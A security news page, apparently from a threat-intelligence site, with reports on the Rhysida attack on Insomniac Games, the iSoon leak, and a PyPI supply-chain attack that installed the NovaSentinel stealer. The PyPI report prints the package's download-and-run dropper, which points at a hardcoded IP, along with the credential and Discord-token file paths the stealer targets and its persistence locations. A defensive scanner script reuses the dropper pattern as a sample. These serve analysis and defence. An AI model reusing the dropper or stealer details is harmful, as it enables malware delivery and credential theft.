Cyberspying


Iranian Hackers spying on UAE, Kuwait Government Agencies using ScreenConnect

Government agencies in the UAE and Kuwait are both targets of a new cyber-espionage campaign, potentially carried out by Iranian threat actors.

11-Feb-2021
3 min read

Related Articles


Sony

Rhysida


Insomniac Games, a subsidiary of Sony Interactive Entertainment, fell victim to a ransomware attack by the Rhysida gang in November, resulting in the theft and leak of sensitive employee data. This breach raises critical concerns about cybersecurity measures within the gaming industry.

#### Background

Insomniac Games, renowned for titles like Spider-Man and Spyro the Dragon, faced a daunting challenge when Rhysida demanded a $2 million ransom. Despite Sony's investigation, negotiations failed, leading to the leakage of 1.67 TB of data, including personal information and sensitive contracts.

#### Rhysida Gang

Rhysida, notorious for attacks on government institutions and healthcare organizations, poses a significant threat with its ransomware-as-a-service (RaaS) model. Its emergence in 2023 marked a wave of cyberattacks, highlighting vulnerabilities across various sectors.

#### Industry Impact

Insomniac Games joins a growing list of gaming giants targeted by cybercriminals, including Rockstar, Activision Blizzard, and Ubisoft. These incidents underscore the urgent need for robust cybersecurity protocols within the gaming industry to safeguard sensitive data.

#### Response and Mitigation

In response to the breach, Insomniac Games and Sony have extended ID Watchdog services and provided two additional years of complimentary credit monitoring. This proactive approach aims to mitigate the impact on affected employees and prevent further exploitation of stolen data.

24-Feb-2024
2 min read

Python

NovaSentinel

Uncover how a compromised PyPI package deployed the NovaSentinel stealer supply ...

The recent compromise of the dormant Python package "django-log-tracker" on PyPI highlights the insidious threat of supply chain attacks. On February 21, 2024, a malicious update, disguised as innocuous, injected the NovaSentinel information stealer into the package. This [Threatfeed](https://www.secureblink.com/cyber-security-news) dissects the attack, explores NovaSentinel's capabilities, and underscores the need for heightened vigilance in open-source security.

## Malicious Update: A Magnified Look

The attacker meticulously obscured their intent by removing most of django-log-tracker's original functionality. The remaining `__init__.py` and `example.py` files contained the malicious payload:

```python
import wget
import os

# Second-stage binary is fetched into %APPDATA% and launched on import
URL = "http://45.88.180.54/DONTTUCHTHIS/Updater_1.4.4_x64.exe"
fileName = "Updater_1.4.4_x64.exe"
appdataRoamingPath = os.getenv('APPDATA')
fullPath = os.path.join(appdataRoamingPath, fileName)
response = wget.download(URL, fullPath)
os.startfile(fullPath)
```

Though simple, this [code](https://docs.python.org/3/library/os.html#os.startfile) initiates a damaging sequence: downloading an executable from a suspicious location and immediately executing it.

## NovaSentinel Stealer: Exposing its Capabilities

The downloaded "Updater" is an NSIS installer, a common tactic for masking malicious payloads. Extracting the installer's contents reveals an Electron app, a prime vehicle for obfuscating code. Within the heavily obfuscated JavaScript lies the heart of the attack: the NovaSentinel stealer.

***NovaSentinel's primary objective is data theft. It targets:***

- **Browsers:** Saved passwords, autofill data, cookies, browsing history
- **Cryptocurrency Wallets:** Keys and seed phrases for various blockchains
- **Communication Apps:** Discord tokens, potentially granting access to accounts and servers
- **Gaming Credentials:** Minecraft, Roblox, etc.
- **System Data:** Wi-Fi passwords, WinSCP credentials

### Persistence Mechanisms

NovaSentinel seeks to establish a foothold within the compromised system. It attempts to inject itself into:

- Chrome
- Discord
- Exodus, Mullvad, Atomic, and MailSpring (cryptocurrency, VPN, and email clients)

### Exfiltration and Impact

NovaSentinel likely transmits stolen data to a command-and-control server operated by the attacker. The consequences for victims can be severe:

- Financial loss through cryptocurrency theft
- Account compromise on various platforms
- Identity theft and fraud

### NovaSentinel's Clipboard Hijacker

Analysis discloses a configuration file for a clipboard hijacker component. This highlights the attacker's intent to steal cryptocurrency by replacing wallet addresses:

```json
{
  "ltc_address": "LUkCrDuUBPGH9uVQQHFS5hyi1xPJ38cbUb",
  "xlm_address": "GBYNIZIJWZT7I2VTCVASDKIM6OXRKNRN4MVS6NTG2L23EIBQENPS5ZA7",
  ... // Additional addresses
}
```

## Implications and Defense Strategies

**Supply Chain Vulnerabilities:** This attack demonstrates how even dormant packages can endanger projects with flexible dependencies.

**Open-Source Trust:** Trust in the open-source ecosystem must be balanced with vigilance.

**Proactive Measures:**

- Pin project dependencies to exact versions
- Conduct regular code audits, including third-party dependencies
- Implement vulnerability scanning tools
- Adopt a layered security approach (endpoint protection, network monitoring, user education)

## NovaSentinel: Targeting Browsers

NovaSentinel's browser-focused component is designed to pillage vast amounts of sensitive user data.

***Here's a breakdown of its potential methods:***

**SQLite Database Extraction:** Browsers like Chrome and Firefox store passwords, autofill data, cookies, and history in SQLite databases. NovaSentinel likely copies these database files for exfiltration. Decoding and parsing the contents would give the attacker access to a treasure trove of information.

**Targeting Chromium-based Browsers:** NovaSentinel might specifically target Chromium-based browsers due to their popularity and shared code structure. It could leverage these commonalities to extract:

- **Login Data:** Saved usernames and passwords from the "Login Data" file.
- **Cookies:** Session cookies used for authentication could be hijacked to impersonate victims on active sessions.
- **Credit Card Data:** Saved credit card information from the _"Web Data"_ file.

**Keylogging:** While less common in pre-packaged stealers, NovaSentinel could be modified to include a keylogging module. This would allow it to record every keystroke typed by the user, providing a live stream of passwords and other sensitive input.

## Discord Token Abuse: Beyond Account Takeover

Discord tokens are more than just keys to unlock accounts.

***Here's how NovaSentinel might weaponize them:***

**Social Engineering:** Stolen tokens allow the attacker to impersonate the victim, potentially fooling friends or server members into divulging sensitive information or downloading malware.

**Spreading Malware:** The attacker could leverage compromised accounts to distribute infected files or links to other users within Discord servers, amplifying the attack's reach.

**Server Reconnaissance:** If the victim is a member of high-value Discord servers (related to cryptocurrency, gaming, etc.), the attacker can gain valuable insights into potential targets or gather intelligence before launching tailored attacks.

**Token Reselling:** Discord tokens have a market value on darknet forums. NovaSentinel could include functionality to collect tokens even without immediate exploitation, selling them in bulk to other attackers.

## How NovaSentinel Could Extract Data from SQLite Databases

**Locating Target Databases:** NovaSentinel will first need to identify where browsers store their sensitive data. Common database file paths include:

- Chrome: `%LocalAppData%\Google\Chrome\User Data\Default\Login Data`
- Firefox: `%AppData%\Mozilla\Firefox\Profiles\xxxxxxxx.default\logins.json` (and related files)

**Copying the Databases:** The stealer likely makes a direct copy of these target database files. This allows for offline exfiltration and minimizes suspicious interactions with the files that might trigger antivirus software.

**SQLite Library or Custom Parsing:** To actually extract valuable information, NovaSentinel has two primary options:

- **Embedded SQLite Library:** It could directly include a lightweight SQLite library within its code to interact with the database files. This gives it flexibility but may increase the malware's file size.
- **Custom Parser:** If the stealer prioritizes a small footprint, it might contain a custom parser built specifically to understand the structure of browser databases and extract the desired fields (e.g., usernames, passwords, URLs).

**Data Extraction:** Regardless of the method, the key goal is to parse the database contents, focusing on the tables or files within the database that house these elements:

- Passwords and usernames
- Autofill data (addresses, credit card information)
- Cookies
- Browsing history

**Exfiltration:** The extracted data is likely compiled into a structured format (text file, JSON, etc.) and prepared for transmission to the attacker's command-and-control (C2) server.

## Mechanics of Discord Token Abuse

**Token Location:** NovaSentinel needs to find where Discord stores user authentication tokens. These are typically located in:

- `%AppData%\Discord\Local Storage\leveldb\` (Windows)
- `~/Library/Application Support/discord/Local Storage/leveldb/` (macOS)

**Extracting Tokens:** LevelDB databases might not follow a standard structure. NovaSentinel may use a custom parsing routine to search for strings that fit the pattern of Discord tokens (they often have a specific format).

**Making API Requests:** With the token, NovaSentinel can make authenticated API calls to the Discord server, impersonating the victim. Here are a few malicious possibilities:

- **Send Messages:** Post messages as the victim in private chats or servers.
- **Read Message History:** Access message logs, potentially uncovering sensitive information.
- **Modify User Settings:** Change the victim's profile, status, or even password (if no MFA is present).
- **Join Servers:** Automatically join the victim to new servers under the attacker's control.
- **Gather Server Information:** List members, channels, and roles of servers the victim belongs to.

Discord has safeguards to prevent excessive use of its API. NovaSentinel may need to spread its malicious actions over time or use multiple stolen tokens to avoid triggering these limits. Discord and antivirus vendors are constantly improving their detection of token abuse. NovaSentinel might frequently change its techniques to remain evasive.

#### Persistence Mechanisms

NovaSentinel's persistence strategies likely involve a combination of techniques to maximize its chances of remaining embedded in a compromised system. Here are some possibilities:

**Modifying Startup Entries:** NovaSentinel might add itself to the Windows Registry startup keys (`HKCU\Software\Microsoft\Windows\CurrentVersion\Run`) or create scheduled tasks to ensure it runs upon system boot or at regular intervals.

**Hijacking Browser Extensions:** Injecting malicious code into existing browser extensions provides a stealthy way to maintain persistence while also potentially opening avenues for further data theft and monitoring.

**File Masquerading:** NovaSentinel tends to disguise itself as a legitimate-looking system or application file, using recognizable icons and names to avoid detection.

#### Obfuscation and Anti-Analysis Tactics

**JavaScript Obfuscation:** The heavily obfuscated JavaScript code we observed is a common tactic to hinder analysis. NovaSentinel likely employs multiple obfuscation layers, including variable renaming, string encoding, and control flow obfuscation.

**Anti-Debugging and Anti-VM:** It might include checks for the presence of debuggers or virtual machine environments. If detected, the malware could exit or alter its behavior to make analysis more difficult.

**Packers and Crypters:** The NSIS installer itself could be just the first layer. NovaSentinel might further utilize packers or crypters to compress and encrypt its core components, adding an extra barrier for reverse engineers.

### Network Communication and Exfiltration

**Command-and-Control (C2) Communication:** NovaSentinel likely establishes a communication channel with a server controlled by the attacker. This could be via:

- Hardcoded IP addresses or domains
- Domain Generation Algorithms (DGAs) for resilience

**Exfiltration Protocols:** It might use common protocols like HTTP or HTTPS to blend in with regular web traffic. Additionally, it could leverage stealthier protocols like DNS tunneling to hide its exfiltration activities.
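The two defensive points this article makes about the django-log-tracker update, that flexible (unpinned) dependencies let a trojanised release in, and that the payload was a plain download-then-launch sequence, can both be checked mechanically before `pip install` runs anything. The script below is an added example written for this page, not code from the article, from Secure Blink or from PyPI. It parses a requirements file and reports every dependency that is not pinned to a single exact version, and it walks the AST of a package's Python sources looking for a remote-fetch call paired with a file-launch call, plus string constants holding URLs whose host is a bare IP address. The `DOWNLOAD_CALLS` and `EXEC_CALLS` sets, the simplified requirement-line grammar, and all sample inputs (including the TEST-NET address `192.0.2.10`) are assumptions constructed for the example.

```python
"""Pre-install dependency audit (added example; not code from the article or from PyPI)."""
from __future__ import annotations

import ast
import re
from dataclasses import dataclass, field

# name, optional [extras], remaining version specifier, e.g. "django==4.2.11"
# (a deliberate simplification of PEP 508, constructed for this example)
_REQ_RE = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)(\[[^\]]*\])?(.*)$")
# http(s) URL whose host is a literal IPv4 address rather than a hostname
_BARE_IP_URL_RE = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?![\w.])")

# Dotted call names that fetch remote content or launch a file (assumed starter lists)
DOWNLOAD_CALLS = {"wget.download", "urllib.request.urlretrieve", "urllib.request.urlopen", "requests.get"}
EXEC_CALLS = {"os.startfile", "os.system", "os.execv", "subprocess.run", "subprocess.Popen", "subprocess.call"}


def unpinned_requirements(requirements_text: str) -> list[str]:
    """Return names of requirements not pinned with a single exact '==' version."""
    findings = []
    for raw in requirements_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("-"):
            continue  # blank, comment, or a pip option line such as -r / --index-url
        req = line.split()[0].split(";", 1)[0]  # drop --hash=... options and environment markers
        match = _REQ_RE.match(req)
        if not match:
            continue
        name, spec = match.group(1), match.group(3)
        clauses = [c.strip() for c in spec.split(",") if c.strip()]
        exact = len(clauses) == 1 and clauses[0].startswith("==") and not clauses[0].endswith("*")
        if not exact:
            findings.append(name)
    return findings


def _dotted_name(node: ast.AST) -> str | None:
    """Turn a Call's func node (e.g. os.path.join) into its dotted name, or None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return None
    parts.append(node.id)
    return ".".join(reversed(parts))


@dataclass
class SourceFindings:
    bare_ip_urls: list[str] = field(default_factory=list)
    download_calls: list[str] = field(default_factory=list)   # "name:line"
    exec_calls: list[str] = field(default_factory=list)       # "name:line"

    @property
    def download_and_execute(self) -> bool:
        return bool(self.download_calls) and bool(self.exec_calls)


def scan_source(source: str) -> SourceFindings:
    """Scan one Python source file for the download-and-execute pattern."""
    findings = SourceFindings()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if _BARE_IP_URL_RE.search(node.value):
                findings.bare_ip_urls.append(node.value)
        elif isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in DOWNLOAD_CALLS:
                findings.download_calls.append(f"{name}:{node.lineno}")
            elif name in EXEC_CALLS:
                findings.exec_calls.append(f"{name}:{node.lineno}")
    return findings


def audit_package(requirements_text: str, sources: dict[str, str]) -> dict:
    """Combine both checks into one report keyed by finding type."""
    report = {"unpinned": unpinned_requirements(requirements_text),
              "download_and_execute": [], "bare_ip_urls": []}
    for path, src in sources.items():
        found = scan_source(src)
        if found.download_and_execute:
            report["download_and_execute"].append(path)
        report["bare_ip_urls"].extend((path, url) for url in found.bare_ip_urls)
    return report


# Constructed sample inputs (not real project files).
SAMPLE_REQUIREMENTS = """\
django==4.2.11 --hash=sha256:PLACEHOLDER_HASH
django-log-tracker          # unpinned: any new upload, benign or trojanised, is accepted
requests>=2.31,<3
wget~=3.2
"""
SAMPLE_MALICIOUS_SOURCE = '''
import wget
import os
URL = "http://192.0.2.10/updates/Updater.exe"   # TEST-NET address, constructed
fullPath = os.path.join(os.getenv("APPDATA"), "Updater.exe")
wget.download(URL, fullPath)
os.startfile(fullPath)
'''
SAMPLE_BENIGN_SOURCE = '''
import json
def load(path):
    with open(path) as fh:
        return json.load(fh)
'''

if __name__ == "__main__":
    print(audit_package(SAMPLE_REQUIREMENTS,
                        {"pkg/__init__.py": SAMPLE_MALICIOUS_SOURCE, "pkg/util.py": SAMPLE_BENIGN_SOURCE}))
```

Run against an unpacked sdist or wheel in CI, a non-empty `download_and_execute` or `bare_ip_urls` list is a reason to block the install and review by hand; the `unpinned` list is the lower-cost fix, since pinning (ideally with `--hash`) means a later malicious upload of the same package name is simply never fetched.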

24-Feb-2024
8 min read

APT

China's State-Backed Hackers Exposed: iSoon Leaked Data Reveals Global Targets, ...

A trove of leaked documents, originally found on GitHub before being removed, has laid bare the inner workings of China's secretive cyber espionage operations. These leaks center on the company iSoon, which presents a contradictory facade: posing as a cybersecurity firm while facing credible allegations of acting as an _"Advanced Persistent Threat (APT)-for-hire."_ Though direct links to the Chinese government remain difficult to conclusively prove, security experts widely suspect state sponsorship. This breach exposes China's tactics, India's critical position as a prime target, and the alarming new model of using private hackers to execute state-backed cyber espionage.

## Inside iSoon – Anatomy of a Cyber Espionage Operation

I-Soon, also referred to as [Anxun](https://github.com/soufianetahiri/Anxun-isoon/tree/main/OCRd_images) in Mandarin, operates as a Chinese firm purportedly specializing in public network security and digital intelligence solutions. Despite its outward facade, leaked data suggests a more clandestine role, potentially functioning as an "Advanced Persistent Threat (APT)-for-hire," collaborating with entities such as the Chinese Ministry of Public Security (MPS) and potentially other state agencies. Here's a brief overview of I-Soon:

- **Founded:** 2010
- **Headquarters:** Shanghai, China
- **Services:** Cybersecurity, digital intelligence
- **Allegations:** Cyber espionage, hacking, surveillance, targeting governments, businesses, and individuals

The company garnered attention in February 2024 following a substantial data leak. The leaked information comprised contracts, communications, and other documents seemingly affirming I-Soon's involvement in cyber espionage endeavors. Specifically, I-Soon (上海安洵) serves as a contractor for various PRC agencies, including the Ministry of Public Security, Ministry of State Security, and People's Liberation Army.

The leaked data, which surfaced over the weekend of February 16th, offers a rare glimpse into the internal workings of a state-affiliated hacking contractor. Leaked chats also reveal the dominance of a user named "lengmo," implying a leadership role. Intense communication between "lengmo" and "Shutd0wn" hints at internal hierarchies and potential influences within iSoon's operations. However, the authenticity of the leaked documents remains uncertain. While the contents of the leak validate public threat intelligence, efforts to corroborate the documents are ongoing.

Message timestamps show that peak activity aligns with Chinese work hours. While operational schedules can shift, this predictability could potentially offer defenders a vulnerability to exploit.

iSoon's arsenal includes custom malware targeting a range of operating systems (Windows, macOS, Linux, iOS, Android), social media infiltration tools, hardware for physical attacks, and OSINT-driven reconnaissance capabilities. Sources like Mandiant Intelligence corroborate these findings.

Leaked chats expose internal financial pressures, employee complaints about low pay, and a sense of demoralization within the company. This instability could increase security risks on the attacker side and offer potential avenues for counterintelligence efforts. iSoon's suspected origins in Chengdu, an infamous hub for Chinese hacker-for-hire groups, highlight the city's significance in state-sponsored cyber warfare operations.

Security analysts, including John Hultquist of Mandiant Intelligence, authenticate the leaked data, emphasizing its significance in understanding China's cybersecurity capabilities. The involvement of iSoon, allegedly linked to the Chinese government, reinforces suspicions of state-sponsored cyber espionage.

## Victims – China's Global Espionage Web and India's Critical Role

A leaked spreadsheet verifies at least 80 successful overseas attacks by iSoon. Among these are staggering data breaches, including 95.2 gigabytes of Indian immigration data, 3 terabytes of call logs from South Korean telecom provider LG U Plus, and 459 gigabytes of sensitive Taiwanese mapping data.

On Tuesday, a user on the social media platform X who goes by the moniker [Dakota Cary](https://x.com/DakotaInDC?t=8DwfPjPEQvqa_FPZiLvMmw&s=09) raised evidence-based allegations regarding the leakage of documents from Chinese cyber agencies on GitHub. The user asserted that these documents included data from the EPFO, the Indian PMO, and a range of public and private organizations. Prominent Indian targets include the Prime Minister's Office (PMO), the Ministry of Finance, the Ministry of External Affairs, and private entities like EPFO, BSNL, Apollo Hospitals, and Air India.

The leaked documentation reveals a shocking capability of the attackers to infiltrate both Android and iOS devices, extracting a treasure trove of sensitive data. From hardware specifics to GPS coordinates, contact lists, media files, and even live audio recordings, nothing seems beyond their grasp. Adding to the intrigue, reports suggest the use of discreet gadgets resembling common Chinese portable batteries, ingeniously deployed to inject malicious code into targeted Android devices via unsuspecting WiFi signals.

These breaches pose severe threats to national security and individual privacy, and undermine India's economic competitiveness. iSoon's tools are used to monitor and suppress minority groups within China and track overseas Chinese communities. This reveals how China leverages cyberwarfare for internal control and the surveillance of perceived dissidents. Confirmed targets extend beyond India to Vietnam, Indonesia, Nigeria, and others. Even discussions about targeting NATO, while likely complex to execute, showcase the vast scope of China's cyber ambitions and its willingness to consider even heavily defended entities as potential victims.

Analysts have identified intriguing parallels between iSoon and various established Chinese APTs, especially APT41. According to Adam Meyers, who leads counter-adversary operations at CrowdStrike, the group's maneuvers and infrastructure bear a striking resemblance to those attributed to Aquatic Panda (known by aliases like Budworm, Charcoal Typhoon, ControlX, RedHotel, and BRONZE UNIVERSITY). Within the trove of over 500 leaked documents lies a wealth of material, including promotional content, operational guides, rosters of clients and staff, WeChat exchanges between clients and staff, and a host of other undisclosed files.

## Ecosystem – China's Hacker Marketplace

iSoon is just one player in a complex network of state-backed hackers-for-hire operating with a blend of patriotic and profit-driven motives. China has pioneered an insidious model, outsourcing hacking operations to private companies. This provides plausible deniability and increased scalability, and encourages innovation through internal competition. Leaked contracts expose surprisingly low prices for attacks on sensitive targets. This significantly expands the pool of potential victims and amplifies the threat on a global scale. The lawsuit between iSoon and the indicted group Chengdu 404, along with anecdotes like the "drinking committee," illustrates the blurry lines between rival and cooperating entities within China's state-sanctioned hacking industry.

## Expert Analysis, India's Vulnerability, and Global Response

While definitively proving Chinese government control remains elusive, the cybersecurity community strongly leans towards the iSoon leak exposing another weapon in China's cyber arsenal. Quotes from leading experts at Mandiant Intelligence and other firms underscore the leak's significance, with insights extending beyond the technical details into China's strategic goals.

Budget models designed to defend against traditional APTs fall short against state-backed entities like iSoon, which undercut legitimate security providers. Previous cyberattacks on India can now be linked to the scale of operations revealed in the iSoon leak. India is one among many nations targeted; the leak underscores a global threat. Only through information sharing, coordinated law enforcement efforts, and a united front demanding accountability from China can this onslaught be effectively countered. Beyond India, China's cyber operations extend to countries like Pakistan, Nepal, and Myanmar, highlighting a broader geopolitical agenda. The theft of data from governmental and institutional entities across various nations underscores China's aggressive cybersecurity strategy.

24-Feb-2024
7 min read